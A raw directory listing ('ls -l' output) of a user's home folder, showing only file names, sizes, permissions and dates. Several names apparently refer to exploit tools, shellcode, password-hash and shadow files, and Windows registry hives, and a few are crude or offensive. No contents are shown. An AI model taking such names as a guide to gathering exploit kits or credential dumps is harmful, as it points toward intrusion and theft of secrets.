-rw-r--r--    1 thalakan  thalakan         844 Mar 16 15:11 lfwell_1-confg.diff
-rwxr-xr--    1 thalakan  thalakan      140711 Mar 17 13:28 lfwell_1-tech.
drwxr-xr-x    6 thalakan  thalakan         512 Oct 26  2003 lima-1.0b5
-rw-r--r--    1 thalakan  thalakan     2043206 Nov  2  2003 lima-1.0b5+driver.tar.gz
-rw-r--r--    1 thalakan  thalakan       19815 Jun 20  2005 list.rtf
-rw-r--r--    1 thalakan  thalakan       68060 Jul 30  2002 lj2.jpg
-rw-r--r--    1 thalakan  thalakan       10983 Aug  9  2008 lmnt.raw
drwxr-xr-x    2 thalakan  thalakan         512 Dec 21  2008 lmwtfu.com
-rw-r--r--    1 thalakan  thalakan          27 Mar  8 16:09 loc.txt
-rw-r--r--    1 thalakan  thalakan       37095 Jun  9  2006 log.txt
-rw-r--r--    1 thalakan  thalakan       34419 May  9  2006 log.txt~
-rw-r--r--    1 thalakan  thalakan      848168 Apr 22 18:55 log_20090422-234123
-rw-------    1 thalakan  thalakan       10280 Nov 28  2006 logo-meta.scm
-rw-------    1 thalakan  thalakan        6433 Nov 28  2006 logo.scm
drwxr-xr-x    3 thalakan  thalakan        3584 Jan  3  2009 lolol
-rwxr-xr-x    1 thalakan  thalakan         260 Aug 24  2002 lottery-histogram.pl
-rw-r--r--    1 thalakan  thalakan      817685 Mar 21  2002 lsi.tar.gz
drwxr-xr-x    6 thalakan  thalakan        1024 Oct 22  2004 ltrace-0.3.35.1
-rw-r--r--    1 thalakan  thalakan      209102 Oct 28  2004 ltrace_0.3.35.1.tar.gz
-rw-r--r--    1 thalakan  thalakan        2518 Apr 16  2001 mab20010416.tar.gz
-rw-r--r--    1 thalakan  thalakan      146803 Sep  7  2004 magic.nb
-rw-r--r--    1 thalakan  thalakan        3836 Sep  2  2004 magnitude.nb
-rw-r--r--    1 root      thalakan        2722 Jun  1  2005 mail.cap
-rw-r--r--    1 thalakan  thalakan       10188 Jun  5  2002 manual2-diff
drwxr-xr-x   11 thalakan  thalakan         512 Nov 14  2002 massrooter
-rw-r--r--    1 thalakan  thalakan     1505102 Sep  6  2002 massrooter.tar.gz
-rw-r--r--    1 thalakan  thalakan     1724731 Nov 13  2002 massrooterfinal.tar.gz
-rwxr-xr-x    1 thalakan  thalakan        8280 Dec  2  2004 matrixwhack
-rw-r--r--    1 thalakan  thalakan        1614 Nov  8  2004 matrixwhack.c
-rw-r--r--    1 thalakan  thalakan          10 Nov  8  2004 matrixwhack.c~
-rw-r--r--    1 thalakan  thalakan         301 Nov  8  2004 matrixwhack.h
-rw-r--r--    1 thalakan  thalakan         212 Nov  8  2004 matrixwhack.h~
-rw-r--r--    1 thalakan  thalakan        4100 Nov  8  2004 matrixwhack.o
-rwxr-xr-x    1 thalakan  thalakan        5066 Dec  2  2004 matrixwhack2
-rw-r--r--    1 thalakan  thalakan        1609 Dec  2  2004 matrixwhack2.c
-rw-r--r--    1 thalakan  thalakan        1614 Dec  2  2004 matrixwhack2.c~
-rw-r--r--    1 thalakan  thalakan         294 Dec  2  2004 matrixwhack2.h
-rw-r--r--    1 thalakan  thalakan         301 Dec  2  2004 matrixwhack2.h~
-rwxr-xr-x    1 thalakan  thalakan        2233 Jan 24  2002 mbox2maildir
-rwxr--r--    1 thalakan  thalakan        1121 Apr  6  2003 mcinotes.txt
-rwxr--r--    1 thalakan  thalakan         884 Apr  6  2003 mcinotes.txt~
-rw-r--r--    1 thalakan  thalakan         197 Aug  9  2008 md5s
-rw-r--r--    1 thalakan  thalakan       19894 Oct  5  2002 me.jpg
-rwxr-xr-x    1 thalakan  thalakan         296 Aug 28  2003 megahit.sh
-rw-r--r--    1 thalakan  thalakan         405 Jun 15  2003 mem.c
-rwxr-xr-x    1 thalakan  thalakan       17396 Nov 29  2005 memoryscan
-rw-r--r--    1 thalakan  thalakan        1266 Nov 30  2005 memoryscan.c
-rw-r--r--    1 thalakan  thalakan         207 Nov 29  2005 memoryscan.c~
-rwxr-xr-x    1 thalakan  thalakan       17149 Nov 29  2005 memoryscano
-rw-r--r--    1 thalakan  thalakan         880 Apr 20  2005 memview.asm
-rw-r--r--    1 thalakan  thalakan         625 Apr 20  2005 memview.asm~
-rw-r--r--    1 thalakan  thalakan          36 Apr 20  2005 memview.com
-rw-r--r--    1 thalakan  thalakan         528 Jun  5  2005 message
-rw-r--r--    1 thalakan  thalakan         369 Jun  5  2005 message.txt
-rwxr-x---    1 thalakan  thalakan     1028096 Feb 28  2005 mfc42.dll
drwxr-xr-x    9 thalakan  thalakan        1024 Dec 24  2002 minewt
-rw-r--r--    1 thalakan  thalakan      162396 Aug 12  2002 minewt-1.0.tar.gz
drwxr-xr-x    7 thalakan  thalakan        1024 Sep 25  2002 minewt-new-1.0
-rw-r--r--    1 thalakan  thalakan     1080296 Sep 19  2002 minewt-new-1.0.tar.gz
drwxr-xr-x   45 thalakan  thalakan        1024 Jan  3  2009 miser
-rwxr-xr--    1 thalakan  thalakan    11358374 Jan 10  2006 miser_source.zip
drwxr-xr-x    3 thalakan  thalakan         512 Oct  3  2005 mitpress.mit.edu
-rw-r--r--    1 thalakan  thalakan        4029 Apr  8  2002 mkstemp-diff
-rw-r--r--    1 thalakan  thalakan        3821 Apr 26  2003 mm.asm
-rw-r--r--    1 thalakan  thalakan        1017 Apr  7  2003 mm.inc
-rwx------    1 thalakan  thalakan        4564 Apr 26  2003 mmsystem.inc
-rw-r--r--    1 thalakan  thalakan     1474560 Jun 27  2002 mochagrub.img
-rwxr-xr-x    1 thalakan  thalakan        2447 Aug 22  2008 monitor.sh
-rw-r--r--    1 thalakan  thalakan       17338 Jun  6  2003 monitor.tar.gz
-rw-r--r--    1 thalakan  thalakan    15624276 Jun 21  2003 mookie
-rwxr-xr-x    1 thalakan  thalakan       10091 Feb 14  2005 mp3dump
-rw-r--r--    1 thalakan  thalakan        1344 Feb 14  2005 mp3dump.c
-rw-r--r--    1 thalakan  thalakan        1289 Feb 10  2005 mp3dump.c~
-rw-r--r--    1 thalakan  thalakan         485 Feb 10  2005 mp3dump.h
-rw-r--r--    1 thalakan  thalakan          63 Feb 10  2005 mp3dump.h~
-rw-r--r--    1 thalakan  thalakan      932014 Jul 19  2002 mr314v326.bin
drwxr-xr-x    2 thalakan  thalakan         512 Mar 25  2006 mrl
-rwxr-xr-x    1 thalakan  thalakan         412 Feb 18  2006 mrlbot.pl
-rwxr-xr-x    1 thalakan  thalakan         356 Feb 18  2006 mrlbot.pl~
-rw-r--r--    1 root      thalakan           0 Nov 18  2002 mrtg.cfg_l
-rw-------    1 thalakan  thalakan        3847 Mar  4  2003 msg
-rwxr-x---    1 thalakan  thalakan      413696 Feb 28  2005 msvcp60.dll
drwx------    3 thalakan  thalakan         512 Sep 20  2002 mutella
drwxr-xr-x    2 thalakan  thalakan         512 Jun 19  2002 mutt-address-book
drwxr-xr-x    2 thalakan  thalakan         512 Oct 31  2005 my-cs61a
drwxr-xr-x   10 thalakan  thalakan        8704 Oct 24  2004 my-openssh
-rw-r--r--    1 thalakan  thalakan     2735413 Sep 28  2007 my_xxx_twin_torrents.rar
-rw-r-----    1 thalakan  thalakan        2657 Aug 13  2002 mybridge.cpp
drwxr-xr-x   33 thalakan  thalakan        1024 Nov 19  2008 mysql-5.1.30
-rw-r--r--    1 thalakan  thalakan    29050568 Nov 19  2008 mysql-5.1.30.tar.gz
-rw-r--r--    1 thalakan  thalakan    24554742 May  9  2007 mysql-gui-tools-5.0r12-linux-i386.tar.gz
-rw-r--r--    1 thalakan  thalakan       20331 Aug 13  2002 mytpbx.cpp
-rw-r--r--    1 thalakan  thalakan      252438 Aug  5  2002 ncb.pdf
-rw-r--r--    1 thalakan  thalakan       10678 Jul 31  2008 neat
-rw-r--r--    1 thalakan  thalakan      148842 Aug 13  2004 neato.jpg
-rw-------    1 thalakan  thalakan       88495 Aug 30  2004 neato.mail
-rw-------    1 thalakan  thalakan         751 Feb 21  2003 netmask.c
-rwxr-xr-x    1 thalakan  thalakan         336 Sep  6  2002 netwatch.pl
-rwxr-xr-x    1 thalakan  thalakan         335 Sep  6  2002 netwatch.pl~
-rwxr--r--    1 thalakan  thalakan       84480 Mar  4  2003 networkviztalk.ppt
-rw-r--r--    1 thalakan  thalakan          29 Jul 31  2006 new.txt
drwxr-xr-x    3 thalakan  thalakan         512 Jun  4  2002 news
-rw-r--r--    1 thalakan  thalakan         133 Jan 15  2009 nmsfeatures.txt
-rw-r--r--    1 thalakan  thalakan           0 Feb 11 20:18 nodes.dat
-rw-r--r--    1 thalakan  thalakan        5425 Apr 29 01:08 noisebridge notes.txt
-rw-r--r--    1 thalakan  thalakan         367 Apr 29 02:14 noisebridge.log
-rw-r--r--    1 thalakan  thalakan         186 Apr 29 01:19 noisebridge.log~
-rw-------    1 thalakan  thalakan         323 Sep 13  2004 noncommercial_cpp_l_20729028.lic
-rw-r--r--    1 thalakan  thalakan          26 Feb 14  2005 nops
drwxr-xr-x    4 thalakan  thalakan         512 Jun  1  2007 nopsr.us
-rw-r--r--    1 thalakan  thalakan      135140 Aug 31  2005 notes.txt
-rw-r--r--    1 thalakan  thalakan      135135 Oct  7  2003 notes.txt~
-rw-r--r--    1 thalakan  thalakan        1245 Mar 16 15:11 npnrt1-confg.diff
-rwxr-xr--    1 thalakan  thalakan      162749 Mar 17 13:28 npnrt1-tech.
-rwxr-x---    1 thalakan  thalakan      574592 Apr  8  2005 ntfs.sys
-rwxr-x---    1 thalakan  thalakan     2180992 Apr  8  2005 ntoskrnl.exe
-rw-r--r--    1 thalakan  thalakan          13 Sep 15  2006 numb.txt
-rwx------    1 thalakan  thalakan        2784 Jun 27 12:45 numbers.txt
-rwx------    1 thalakan  thalakan        2546 Jan  1  2009 numbers.txt~
-rwxr--r--    1 thalakan  thalakan        4058 Jun 15  2003 nvram-extract.c
-rw-r--r--    1 thalakan  thalakan       27162 Jan 18  2007 oehs9b_36.sis
drwxr-xr-x    2 thalakan  thalakan         512 Dec  7  2004 ohlone
-rw-r--r--    1 thalakan  thalakan     1178334 Dec  2  2004 ohlone.tar.gz
-rw-r--r--    1 thalakan  thalakan       23319 May 11  2005 oipenvms-v2r2-28jan2005.zip
-rw-r-----    1 thalakan  thalakan         958 Feb 11  2008 ol849-1.shadow
drwx------    5 thalakan  thalakan         512 Oct 10  2003 old-mail
drwxr-xr-x    2 thalakan  thalakan         512 Aug 10  2008 onlive
drwxr-xr-x   17 thalakan  thalakan         512 Nov  1  2004 openbios
-rw-r--r--    1 thalakan  thalakan     5107809 Feb 24  2002 openldap-2.0.18.tar.gz
drwxr-xr-x    9 thalakan  thalakan        8192 Oct 22  2004 openssh
drwxr-xr-x    6 thalakan  thalakan        8704 Mar 24  2006 openssh-4.3p2
-rw-r--r--    1 thalakan  thalakan      941455 Mar 24  2006 openssh-4.3p2.tar.gz
-rw-r--r--    1 thalakan  thalakan        3187 Oct 22  2004 openssh-antibrute-1.diff
drwxr-xr-x    2 thalakan  thalakan         512 Dec 13  2004 openssl-uzi
-rw-r--r--    1 thalakan  thalakan       20061 Mar 31  2003 openssl-uzi.tar.gz
-rw-r--r--    1 thalakan  thalakan     1474560 Dec  8  2004 os.img
-rw-r--r--    1 thalakan  thalakan        6259 Aug 28  2002 os12bad.txt
-rw-r--r--    1 thalakan  thalakan        1307 Aug 28  2002 os12diff.txt
-rw-r--r--    1 thalakan  thalakan        4231 Aug 28  2002 os12good.txt
-rw-r--r--    1 thalakan  thalakan        1349 Aug 28  2002 os12goodkout.txt
-rwxr--r--    1 thalakan  thalakan      305919 Oct 10  2003 ost-notes.txt
-rwxr--r--    1 thalakan  thalakan      305842 May 15  2003 ost-notes.txt~
-rw-r--r--    1 thalakan  thalakan       24576 Apr  2  2002 ost_alert_prompts_1.doc
-rw-r--r--    1 thalakan  thalakan       14816 Mar 25  2002 ost_consult_template.rtf
-rw-r--r--    1 thalakan  thalakan       18513 Apr 23  2002 ost_consult_template_hourly.rtf
-rw-r--r--    1 thalakan  thalakan         529 Apr 12  2007 otv2.asc
-rw-r--r--    1 thalakan  thalakan         342 Jan  1  2009 out
-rw-r--r--    1 thalakan  thalakan      140053 Aug 17  2007 out.png
-rw-r--r--    1 thalakan  thalakan      624046 Apr  4  2002 out.wav
-rw-r--r--    1 thalakan  thalakan     2440906 Jan  1  2009 out1
-rw-r--r--    1 thalakan  thalakan      191188 Sep  6  2005 outbox.dbx
-rw-r--r--    1 thalakan  thalakan          95 Mar  7  2006 pageme.irc
-rw-r--r--    1 thalakan  thalakan          11 Sep 13  2003 pagesize.c
drwxr-xr-x    7 thalakan  thalakan         512 May  1  2007 parts
drwxr-xr-x    2 thalakan  thalakan        1536 Apr 26  2007 patches
-rw-r--r--    1 thalakan  thalakan    32756236 Mar 23  2006 patris227.tgz
-rw-r--r--    1 thalakan  thalakan        5265 Feb 13 00:47 paybycam.log
-rw-r--r--    1 thalakan  thalakan        4888 Feb 12 16:27 paybycam.log~
drwxr-xr-x    4 thalakan  thalakan         512 Jul 17 12:56 phenny
-rw-r--r--    1 thalakan  thalakan       32099 Dec 10  2004 phys 3.nb
drwxr-xr-x   16 thalakan  thalakan        1024 Oct  5  2004 phys-140
-rw-r--r--    1 thalakan  thalakan        9558 Oct 10  2005 pict.scm
drwxr-xr-x    2 thalakan  thalakan         512 Aug 19  2002 pk
-rw-------    1 thalakan  thalakan       41329 May 30  2002 plugin.tar.gz
-rw-r--r--    1 thalakan  thalakan     9253034 Apr  2  2006 polysics-mr-roboto.wmv
-rw-------    1 thalakan  thalakan        5520 Feb  2  2003 pook
-rw-r--r--    1 thalakan  thalakan      132896 Apr 24  2002 port1.wav.gz
-rw-r--r--    1 thalakan  thalakan      146075 Apr 24  2002 port2.wav.gz
-rw-------    1 thalakan  thalakan         744 Jan 24  2002 postponed
-rw-r--r--    1 thalakan  thalakan       47560 Oct 20  1998 pq
-rw-------    1 thalakan  thalakan       80074 Jan 31  2002 press_2_805.au
-rw-r--r--    1 thalakan  thalakan        4497 Jan 24  2002 print.pdf
drwxr-xr-x    2 thalakan  thalakan         512 Mar  1  2002 prism
-rw-r--r--    1 thalakan  thalakan       13732 Mar  1  2002 prism.tar.gz
-rw-r--r--    1 thalakan  thalakan         687 Dec  9  2004 problems.txt
-rw-rw-rw-    1 thalakan  thalakan       68394 Feb  8  2005 procexp.chm
-rw-r--r--    1 thalakan  thalakan      274759 Apr  5  2005 procexp9x.zip
-r--r--r--    1 thalakan  thalakan          63 Jun 18  2002 procmailrc.example
-rw-------    1 thalakan  thalakan       55808 Nov  2  2006 proj3.tar
-rw-r--r--    1 thalakan  thalakan        3742 Nov  6  2005 proj3.tar.gz
-rw-r--r--    1 thalakan  thalakan       10891 Nov  2  2006 proj3a
-rw-------    1 thalakan  thalakan        6175 Nov  6  2005 proj3b.tar.gz
-rw-r--r--    1 thalakan  thalakan        7253 Nov 28  2005 proj4.tar.gz
drwxr-xr-x    2 thalakan  thalakan         512 Dec  5  2005 proj4b
-rw-------    1 thalakan  thalakan        5952 Dec  5  2005 proj4b.tar.gz
drwxr-xr-x    5 thalakan  thalakan         512 May 31  2006 projects
-rw-r--r--    1 thalakan  thalakan       12562 Feb  9  2002 pstj-billspec.rtf
-rw-r--r--    1 thalakan  thalakan      103013 Jan 24  2002 pstj-logs.tar.gz
-rw-r--r--    1 thalakan  thalakan       33844 Jan 24  2002 pstj-logs2.tar.gz
-rw-r--r--    1 thalakan  thalakan      221184 Apr 23  2002 pstj9.doc
-rw-r--r--    1 thalakan  thalakan       94077 Apr 23  2002 pstj9.pdf
-rwxr-xr-x    1 thalakan  thalakan       22419 Nov  4  2004 ptracetest
-rw-r--r--    1 thalakan  thalakan        5940 Nov  4  2004 ptracetest.c
-rw-r--r--    1 thalakan  thalakan        4581 Nov  4  2004 ptracetest.c~
drwxrwxr-x   25 thalakan  thalakan        8192 Apr 25 14:17 public_html
-rw-r--r--    1 thalakan  thalakan        2155 Jan 24  2002 punches
-rw-r--r--    1 thalakan  thalakan       66312 Dec  3  2008 pushall.htm
drwxr-xr-x    2 thalakan  thalakan         512 Apr  6  2007 pvtg.com
-rw-r--r--    1 thalakan  thalakan    17312886 Jan 24  2005 qt-x11-free-3.3.4.tar.gz
drwxr-xr-x    2 thalakan  thalakan        5120 Mar 29  2005 r
-rw-r--r--    1 thalakan  thalakan         333 Sep  5  2007 raep.txt
-rwxr-xr-x    1 thalakan  thalakan        4807 Apr  8  2007 rangetest
-rw-r--r--    1 thalakan  thalakan         835 Apr  8  2007 rangetest.c
drwxr-xr-x    2 thalakan  thalakan         512 Sep  5  2007 rapeforchristmas
-rwxr-xr-x    1 thalakan  thalakan        4679 Dec 21  2008 rbt_jesus.py
-rwxr-xr-x    1 thalakan  thalakan        4672 Dec  3  2008 rbt_jesus.py~
-rwxr--r--    1 thalakan  thalakan         583 Mar 23  2006 readme.txt
-rwxr-xr-x    1 thalakan  thalakan       22585 Jan 17  2003 readomatic
-rwxr-xr-x    1 thalakan  thalakan        2919 Jan 17  2003 readomatic.c
-rwxr-xr-x    1 thalakan  thalakan         486 Jan 17  2003 readomatic.c~
-rwxr-xr-x    1 thalakan  thalakan        1565 Jan 17  2003 readomatic.h
-rwxr-xr-x    1 thalakan  thalakan        1541 Jan 17  2003 readomatic.h~
-rw-r--r--    1 thalakan  thalakan          81 Aug 17  2008 reallyobscure.txt
drwxr-xr-x    3 thalakan  thalakan         512 Dec 10  2007 rearden-scan
-rw-r--r--    1 thalakan  thalakan        2037 Aug 22  2003 record-stats.tar.gz
-rwx------    1 thalakan  thalakan         219 Apr 20  2004 refresh.html
-rw-r--r--    1 thalakan  thalakan       50176 Dec 14  2004 reg.exe
-rwxr--r--    1 thalakan  thalakan        1133 Feb 26  2003 removedup.cpp
-rwxr-xr-x    1 thalakan  thalakan         297 Sep 22  2004 respawn.sh
-rw-r--r--    1 thalakan  thalakan       38912 Apr 23  2002 resume.doc
-rw-r--r--    1 thalakan  thalakan       10156 Jan  6  2003 resume.txt
-rw-r--r--    1 thalakan  thalakan       10974 Dec  3  2002 resume.txt~
-rw-------    1 thalakan  thalakan        1741 Nov  6  2002 retard.html
-rw-r--r--    1 thalakan  thalakan        1582 Nov  6  2002 retard.txt
-rwxr-xr-x    1 thalakan  thalakan        3832 May 30  2008 reversing200-6005c9996e7eb9d344204618b9561bee
-rw-r--r--    1 thalakan  thalakan   105605984 Nov 24  2004 rib.20041124.2150
-rw-r--r--    1 thalakan  thalakan       71940 May 23  2002 rings.wav.gz
-rw-r--r--    1 thalakan  thalakan      590344 Oct 19  2005 root1.tar.gz
-rw-r--r--    1 thalakan  thalakan      337868 Sep 13  2006 root10.tar.gz
-rw-r--r--    1 thalakan  thalakan     1835881 Feb 20  2007 root11.tar.gz
-rw-r--r--    1 thalakan  thalakan      882436 Oct 19  2005 root2.tar.gz
-rw-r--r--    1 thalakan  thalakan     3547052 Oct 19  2005 root3.tar.gz
-rw-r--r--    1 thalakan  thalakan       65794 Apr 21  2006 root4.tar.gz
-rw-r--r--    1 thalakan  wheel         180664 Apr 21  2006 root5.tar.gz
-rw-r--r--    1 thalakan  wheel         127068 Apr 13  2006 root6.tar.gz
-rw-r--r--    1 thalakan  thalakan       68071 Apr 28  2006 root7.tar.gz
-rw-r--r--    1 thalakan  wheel          55269 Apr 28  2006 root8.tar.gz
-rw-r--r--    1 thalakan  thalakan      359252 Sep 11  2006 root9.tar.gz
drwxr-xr-x    2 thalakan  thalakan       95744 Jul 26  2003 rootfu
-rw-r--r--    1 thalakan  thalakan      102400 Jul 21  2003 rootfu.key.old
-rw-r--r--    1 thalakan  thalakan      401023 May 13 01:00 route-views3-damp-snapshot-2009-05-13-0800.dat
-rw-r--r--    1 thalakan  thalakan        1606 Jun 10  2004 router-confg
drwxr-xr-x    2 thalakan  thalakan         512 Jun  7  2006 rover
-rw-r--r--    1 thalakan  thalakan       33824 Jun  7  2006 rover.tar.gz
-rw-r--r--    1 thalakan  thalakan         208 Nov  6  2004 rpcdemo.x~
-rw-r--r--    1 thalakan  thalakan        2388 Jun 26  2002 rpcinfo-timer-diff
-rwxr-xr-x    1 thalakan  thalakan       27482 Nov  7  2004 rsmart
-rw-r--r--    1 thalakan  thalakan         358 Nov  7  2004 rsmart.c
-rw-r--r--    1 thalakan  thalakan         298 Nov  6  2004 rsmart.c~
-rw-r--r--    1 thalakan  thalakan       17564 Nov  7  2004 rsmart.o
-rwxr-xr-x    1 thalakan  thalakan       28382 Nov  7  2004 rsmartd
-rw-r--r--    1 thalakan  thalakan         481 Nov  7  2004 rsmartd.c
-rw-r--r--    1 thalakan  thalakan         219 Nov  7  2004 rsmartd.c~
-rw-r--r--    1 thalakan  thalakan       17008 Nov  7  2004 rsmartd.o
-rw-r--r--    1 thalakan  thalakan       20476 Mar 26  2002 salis-contract.rtf
-rwx------    1 thalakan  thalakan       28672 Feb  5  2003 sam
-rw-------    1 thalakan  thalakan        1024 Feb  5  2003 sam.log
-rwx------    1 thalakan  thalakan         606 Jan 24  2002 sam.out
-rw-r--r--    1 thalakan  thalakan        3377 Feb 22  2002 samcid.out
-rwxr-xr-x    1 thalakan  thalakan         102 Nov  2  2007 sanitize.pl
-rw-r--r--    1 thalakan  thalakan        2016 Apr 11  2008 sayhi.py
drwxr-xr-x    2 thalakan  thalakan         512 Aug 11  2002 scanrand
-rw-r--r--    1 thalakan  thalakan        7711 Aug  9  2002 scanrand_alpha.tar.gz
-rw-r--r--    1 thalakan  thalakan         485 Jan 24  2002 schema
-rwxr-xr-x    1 thalakan  thalakan        1343 Mar 20  2002 scm
drwxr-xr-x   12 thalakan  thalakan         512 Dec  2  2008 scout
-rw-r--r--    1 thalakan  thalakan       67605 Sep 28  2002 scout2.tar.gz
-rwxr-xr-x    1 thalakan  thalakan       36864 Feb  1  2005 scramble.exe
-rw-r--r--    1 thalakan  thalakan    19677152 Apr 17  2007 screenlog.0
-rw-r--r--    1 thalakan  thalakan     9148081 Feb 18  2005 screenlog.2
-rwx------    1 thalakan  thalakan         553 Apr 20  2004 script.html
-rw-r--r--    1 thalakan  thalakan      293856 May 22  2003 script1.obj
-rw-r--r--    1 thalakan  thalakan        6815 Jun 24  2002 scripttest.scr
-rw-r--r--    1 thalakan  thalakan        1358 Aug 13  2004 sel4.pl
drwxr-xr-x    6 thalakan  thalakan        1024 Sep 15  2007 seraph
-rw-r--r--    1 thalakan  thalakan           0 Jul 25  2006 seraph.log
-rw-r--r--    1 thalakan  thalakan          32 Sep 20  2004 seraph.pcap
-rwxr-xr-x    1 thalakan  thalakan        3924 Jun 26  2006 seraph_server.py
-rw-r--r--    1 thalakan  thalakan         199 May  4  2006 seraph_server.py~
-rw-r--r--    1 thalakan  thalakan        2773 Apr 19  2006 service1.c
-rwxr-xr-x    1 thalakan  thalakan        6703 May 21  2008 service2
-rw-r--r--    1 thalakan  thalakan        2843 May 21  2008 service2.c
-rw-r--r--    1 thalakan  thalakan          46 Feb 21  2007 shaitan2
-rw-r--r--    1 thalakan  thalakan          38 Feb 14  2005 shellcode
-rw-r--r--    1 thalakan  thalakan      341291 Apr 22 18:56 shtech
-rw-r--r--    1 thalakan  thalakan      522844 May  4 12:35 shtech3
-rw-r--r--    1 thalakan  thalakan           3 Mar 18  2005 sig
-rw-r--r--    1 thalakan  thalakan       33938 Sep  6  2005 simply.scm
-rw-r--r--    1 thalakan  thalakan     1539072 Oct 28  2008 siw.exe
-rw-r--r--    1 thalakan  thalakan       13856 Sep  3  2007 sizes
-rw-r--r--    1 thalakan  thalakan         926 Jun 19  2002 sk-2501k.def
-rw-r--r--    1 thalakan  thalakan        1684 Apr  3  2002 sloccount
-rw-r--r--    1 thalakan  thalakan         833 Nov  6  2004 smart.h
-rw-r--r--    1 thalakan  thalakan         330 Nov  6  2004 smart.x
-rw-r--r--    1 thalakan  thalakan         238 Nov  6  2004 smart.x~
-rw-r--r--    1 thalakan  thalakan         550 Nov  6  2004 smart_clnt.c
-rw-r--r--    1 thalakan  thalakan       16776 Nov  7  2004 smart_clnt.o
-rw-r--r--    1 thalakan  thalakan        1922 Nov  6  2004 smart_svc.c
-rw-r--r--    1 thalakan  thalakan       19976 Nov  7  2004 smart_svc.o
-rw-r--r--    1 thalakan  thalakan        1026 Nov  6  2004 smart_xdr.c
-rw-r--r--    1 thalakan  thalakan       17536 Nov  7  2004 smart_xdr.o
-rw-r--r--    1 thalakan  thalakan         156 Nov  7  2004 smartd.c~
-rw-r--r--    1 thalakan  thalakan        1441 Jul 31  2008 smithers.hashes
-rw-r--r--    1 thalakan  thalakan       40134 Feb 11  2008 smithers.ldif
drwxr-s--x    2 thalakan  thalakan         512 Aug  2  2005 snoopy-1.3
-rw-r--r--    1 thalakan  thalakan       10423 Dec 20  2000 snoopy-1.3.tar.gz
-rwxr-xr-x    1 thalakan  thalakan       98503 Nov 28  2008 socket_demo
-rw-r--r--    1 thalakan  thalakan      167928 Nov 15  2008 socket_demo.c
-rw-r--r--    1 thalakan  thalakan    20781789 Feb 20 21:09 socket_demo.log
-rw-r--r--    1 thalakan  thalakan          32 Feb 21 14:36 socket_demo_out.log
-rw-r--r--    1 thalakan  thalakan        4017 Feb  3  2004 soe_vpi_points.zip
-rw-r--r--    1 thalakan  thalakan        4057 Oct  2  2004 spawner.c
-rw-r--r--    1 thalakan  thalakan      156967 Mar 21  2002 spec.pdf
-rw-r--r--    1 thalakan  thalakan       30528 Jan 24  2002 spec.rtf
-rwxr--r--    1 thalakan  thalakan       94614 Sep  2  2003 specification1.pdf
-rwxr-xr-x    1 thalakan  thalakan       23836 Feb 17  2004 splat
-rw-r--r--    1 thalakan  thalakan        2357 Feb 17  2004 splat.c
-rw-r--r--    1 thalakan  thalakan        2353 Feb 17  2004 splat.c~
-rwxr-xr-x    1 thalakan  thalakan         675 Feb 17  2004 splat.pl
-rwxr-xr-x    1 thalakan  thalakan         963 Feb 17  2004 splat.pl~
-rw-r--r--    1 thalakan  thalakan          73 Feb 14  2005 sploit
-rwxr-xr-x    1 thalakan  thalakan         681 Jun  4  2005 sploit.pl
-rw-r--r--    1 thalakan  thalakan          33 Jun  4  2005 sploit.pl~
-rw-r--r--    1 thalakan  thalakan         555 Jul  5  2007 spooge.c
-rw-------    1 thalakan  thalakan      238440 May 21  2002 spra462.pdf
-rw-r--r--    1 thalakan  thalakan         800 Feb 27  2005 ssenable.c
-rw-r--r--    1 thalakan  thalakan       65536 Feb 27  2005 ssenable.exe
-rw-r--r--    1 thalakan  thalakan        3846 Nov  5  2006 ssh-wallet.sh
-rw-r--r--    1 thalakan  thalakan        3838 Nov  5  2006 ssh-wallet.sh.orig
-rw-r--r--    1 thalakan  thalakan        4758 Nov  5  2006 ssh-wallet.sh.rej
-rw-r--r--    1 thalakan  thalakan        4758 Nov  5  2006 ssh-wallet.sh.rej.orig
-rwxr-xr-x    1 thalakan  thalakan        2647 Jun 22  2002 sshd~
-rw-r--r--    1 thalakan  thalakan       14816 Jul  1  2002 sshutup-theo.tar.gz
drwxr-xr-x    3 thalakan  thalakan         512 Dec 13  2004 sshutuptheo
-rw-r--r--    1 thalakan  thalakan           0 Jun 25  2004 stage1
-r--r--r--    1 thalakan  thalakan        3300 Jun 25  2004 stage1.out
-r--r--r--    1 thalakan  thalakan        3204 Jun 25  2004 stage2.out
-rw-r--r--    1 thalakan  thalakan         300 Aug 24  2002 steve.lot
-rwxr-xr-x    1 thalakan  thalakan           9 Mar 13  2006 stub
-rw-r--r--    1 thalakan  thalakan       17196 Aug 12  2005 stuff
-rwxr-xr-x    1 thalakan  thalakan        3535 May  7  2007 stuff-box.pl
-rwxr-xr-x    1 thalakan  thalakan        3182 May  3  2007 stuff-box.pl~
-rwxr-xr-x    1 thalakan  thalakan         199 Dec 13  2004 stuff.sh
-rw-r--r--    1 thalakan  thalakan        1856 Dec 12  2004 stuff.tar.gz
-rw-r--r--    1 thalakan  thalakan         180 Nov 22  2006 submit.frm
-rwxr-xr-x    1 thalakan  thalakan        1005 Jul 27  2008 suck2.rb
-rw-r--r--    1 thalakan  thalakan        2993 Dec 10  2004 suggest.html
-rw-r--r--    1 thalakan  thalakan        4558 Jun  6  2002 suit2.jpg
drwxr-xr-x    2 thalakan  thalakan         512 Sep 28  2004 support.ccbill.com
-rw-r--r--    1 thalakan  thalakan    14187159 Apr 17  2004 sys.tar.gz
-rw-r--r--    1 thalakan  thalakan        7662 Jan 21  2005 syskey.txt
-rw-------    1 thalakan  thalakan     6705152 Feb  5  2003 system
-rw-r--r--    1 thalakan  thalakan       21964 Dec 30  2003 sysuaf.dat
-rw-r--r--    1 thalakan  thalakan       10857 Aug 26  2005 t
-rw-r--r--    1 thalakan  thalakan         269 Feb 27  2007 t34m1337-systems.txt
-rw-r--r--    1 thalakan  thalakan        3610 Feb 27  2006 talk_outline.txt
-rw-r--r--    1 thalakan  thalakan    13471956 Jun 30  2004 teams.tgz
-rwx------    1 thalakan  thalakan       21986 Jun 15 12:27 temp.txt
-rwxr-xr-x    1 thalakan  thalakan        1164 Jan 28  2002 template.pl
-rw-r--r--    1 thalakan  thalakan       17112 Jan 24  2002 tempspec.rtf
-rw-r--r--    1 thalakan  thalakan       46573 Feb  7  2002 tempspec2.rtf
-rw-r--r--    1 thalakan  thalakan     5679665 Oct  2  2003 terrysworld.wmv
-rwxr-xr-x    1 thalakan  thalakan        4347 Dec 27  2006 test
-rw-r--r--    1 thalakan  thalakan         328 Mar 19  2004 test.c
-rw-r--r--    1 thalakan  thalakan         365 May  9  2002 test.c~
-rw-r--r--    1 thalakan  thalakan         119 Dec  8  2004 test.f
-rw-r--r--    1 thalakan  thalakan         116 Dec 26  2003 test.f~
-rw-r--r--    1 thalakan  thalakan          78 Dec 27  2006 test.m
